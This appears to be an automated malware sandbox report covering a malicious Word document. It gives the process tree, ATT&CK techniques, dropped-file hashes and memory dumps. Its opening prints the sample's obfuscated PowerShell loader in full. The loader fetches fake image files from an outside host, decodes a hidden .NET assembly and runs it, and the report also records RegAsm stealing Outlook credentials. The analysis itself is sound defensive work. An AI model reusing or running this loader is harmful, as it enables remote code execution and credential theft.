"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreFIDgTreRQBRDgTreC8DgTreMQDgTre3DgTreDEDgTreNwDgTrevDgTreDgDgTreOQDgTreuDgTreDgDgTreODgTreDgTrexDgTreC4DgTreODgTreDgTrezDgTreC4DgTreNDgTreDgTre1DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.REQ/1717/89.881.83.451//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2780

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"
6⤵
PID:2648

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qstdftmtgsdyzfkwabbkttwdn"
6⤵
- Accesses Microsoft Outlook accounts
PID:2764

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\amywflxncavljlgasmnmwyquokoj"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

Filesize
1KB

MD5
fe9957a70857b1a647223e42e3113045

SHA1
2a9de2e884e46f01c8417e09d2d1b914b442f598

SHA256
faa00c989e870b03e92b015e51be69e2b71ef0feb9633f7764f117e4ae78b021

SHA512
1af8fe83d45311457caf685d55bf61988ca80a1ffcc16133a3a167c8c5a8b01ed629003aefda18c3f99a04476d212057ee6f7bc852240c3640432f17866447d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

Filesize
727B

MD5
4a575578f56a0dc8e1f327f2506a9131

SHA1
84dd5df5851dae427605ed5187d3ef7331e7575b

SHA256
4beb4a8eb27e70d6d70573c74209e2e357c53ff746faba87e4c29a1cb0225388

SHA512
36ec4235d927985fccf3e015249f2d89387715e1e2bec388c1d62659d0f6ccb1423fb488de7ca9ec2399f60ecf3d4a9d094c9cc3eb416bff2958ddbd52aa5c29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

Filesize
471B

MD5
e8f53904db1336034369e7073bcecb20

SHA1
b11d646ab2e2f445037218bdc8871c1c39561740

SHA256
da4572394335f59f8250420dec69844b42df76df29ca6ef614bb333324922f94

SHA512
60e044a438c5b99be3178b2460708b1a8f40097b471e5256a48221ae26ef8c1e96cf2b6a5147f81cf685aede4c2cc3b530257db037f9081d6c9ae3c039e8063b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231

Filesize
404B

MD5
e1a4145eaa8304bdadc78f305c2fb47a

SHA1
80e202a8894339e3a37ef82527c728699b357690

SHA256
c3e67a07f7c141e211bd7048801d634638bd688ac86e839b7dd880efa3e030b1

SHA512
d889ce90e1a131e6a99830b783fb3132402fc45ea03cdd5573a8e8b06bd5f213da3ec4db2bc937c020828cb4695a3420f132ad16165f7ea0a036903c111c6920

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
30a2c37e41af5882796b9c4f496b559f

SHA1
47c3dd7cc562215b3958d184f13ef4e7b266e781

SHA256
e345687ebbff30ed3369b505f8208218a8d355803159aa0ea743fa242075ed7d

SHA512
3a4bccc122b3e8856771bf0e05a5417c7de24a8f074e357e19cc9b0d153bfe959e4d021b792ad32cabbc52b860ff1f4eb12ce30e8676a59241a6af6e4d7d3ca9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
acfc0b2988f94f54fc01dc0fb2a9c56c

SHA1
ec76c6d5d13888cd711566e7b5e97c8e713150f6

SHA256
79c12cecfef26d2b637946e2b0419b329cb239a62abdefd5912c9aa383a63afb

SHA512
fbdbae70a264f89c7850b6a3da087467fc6947e98ba3740f1ec4bdee9090df75137a0b4cad62b0e6fa80706535502ec0925322f2930f0923bedd4bc25307dd66

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\96DD3FB36E520A44B4555F9239BEA849_B4791CD67445EC7F0ECEA0014AB0ADA8

Filesize
400B

MD5
7e144301ecb089ef2b6edc1aa9c426a6

SHA1
f387923342498e65d701f644fafd5f19dc3610f9

SHA256
6776418afb1112783f54beebbe05f75220f8f3fb816aaffd29c9eca1b493c2c9

SHA512
69b40c9d3870083414844cec5f76ba875a21a196f5a88322b834573b6017da6d247dcf2c1b71694c298284c1216add577a717ff4cf8f65bb680235d1771ecc0e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

Filesize
400B

MD5
425b9a9fa4b19b9cd14d7528b7d37f3d

SHA1
f6be001f52342c55615aa32f6cb5f02e981befcd

SHA256
ee921fcd01ea9b3c1565f79de281d05601f1c2bf31afdcad53792f8242cc49cd

SHA512
2aec35a27e31b8ab26138b213b23957645e060647901876e77c6b5ea188912e634cf368d45073e7b9600fd380ed2bf2f609d762b49f337b48e10760eadd85698

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{48123BA5-C5A1-4886-8199-7D34F3DA3B53}.FSD

Filesize
128KB

MD5
7f6f413ce20b48cd2c25dbd59d3544ba

SHA1
158c03f3e2552990aaa7a6006545cdd9fe5f1b79

SHA256
181f9ce21bbe318e87e3ff0e05bf9cf98231e5dc4c986198a4714f9e1663935d

SHA512
f49127856d9a0148d955fc4b147e33695e5489fafd6b707176aefc5206cf463ded7765ca267a1d5568182dbf4ae4496cfbbb0895cf26ba56c230d1fd22206f4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
a8eab57689f17d581e4ecc05918ca2ff

SHA1
1bbe773fc962421d29b722948cf47c84986e6ec6

SHA256
e1842c35798c6d391c162cabd18f21eb49a258a71dfbdcf896bca28debc5826b

SHA512
f7339c3213ab2c1afb35d01cf4f24788f1827add56b41783db3498acbbeb71926d19f9c1e65407ea0ca664047e0af94a880f1c5992e3c7eb342514a245c79503

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{816C8E1F-50DF-44F3-A817-E6AE8D85C437}.FSD

Filesize
128KB

MD5
0f8f96968407f7466d875d4ad6c17b2c

SHA1
d274173a14c38147554f2a6c9c4183548fae9565

SHA256
a4df84f4b68298b1ca454b1e23a4358c5e473842f485834271c6af22bf46bde9

SHA512
4cf307b6aa56351003aad6e1fe1e97398db436e948d42bc4a61e06b16bbd44dc01d9c42746ae9a2b3707eceac94c2769e6aad85958cd84e673f96c4e75246a86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\23EIUNT7\kissinggreatwaytounderstandhowimkissingherwithlotofhearttounderstandyouaremygirliloveu_____sweethearttounderstandkissingmygirl[1].doc

Filesize
73KB

MD5
338da1470f51aa8116271555ee990e96

SHA1
0e1cb790e5bc6534c8757794512a8394a1f12d13

SHA256
c02d7beb9210e4edc9fad4c7de3a6827994343e249d3f7544632d8f64847dc74

SHA512
00a79d3fb886066e5f701386e445457fa489b2a63083b75a2d8ae05965cdd21ac7a11dd5267950da882b4bd89d44860506cd650b57e138d96fff353b33919039

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5D9D.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar61BA.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\fqfseabstkltxywkrqgjjh

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{9751B3B7-7E2C-43C2-B681-86DEF0417091}

Filesize
128KB

MD5
2490625e25b7e607cbdef848ba0a304b

SHA1
6fe92f24d2b2daf3c8e1538b4d16e155eb001b59

SHA256
d8874856d79e93ee69a05e17dcd8554c166b6e16623cc7c040f8df4ab02eed66

SHA512
96f6eed8aebb3bcb7dfb6a7f35fa57feef8223f4a2a90b8e62e7a29f7dd9cc10082ce5124a1bd926f874f01e7c0f2d4300743195b41c9c139bb966ebb437c0e1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cefed928671ae6c4645cb42d7003704f

SHA1
b2739dc5461b832ded1e0ed9ceec22844da3393b

SHA256
9aaee4905958b561bd91453e9f32bf87048f1da2e1af069d521d81b6fe70586b

SHA512
fdb987b7c269830527391e012dd2ef8d32d3cbc1156ab139d88fcae2492fccb3e4a1e69832be608da521a1f8d41d41d64339f5daaa243f5a511f781d3ae1e1c6

Download Submit
C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs

Filesize
5KB

MD5
5a00fbd90b552d6c44165a1b1ea8af3d

SHA1
88d2a19718dcc942adc92d30e274b9ae95ae84df

SHA256
fcef19600eb45805e23379e5f0adbcd1a35859aa01505af4cb17276af4d5443d

SHA512
9f7d33f47c8207653ae3a4ae76c86b27c281a86adae01633307592e2666cc9b4acdc118805c4e7a1e43ed16805fa7b100c3bfdafc06fd81794bd195b7a3252a7

Download Submit
memory/112-343-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/112-283-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-292-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-349-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-348-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-346-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-345-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/112-289-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-293-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-287-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/112-344-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/112-340-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
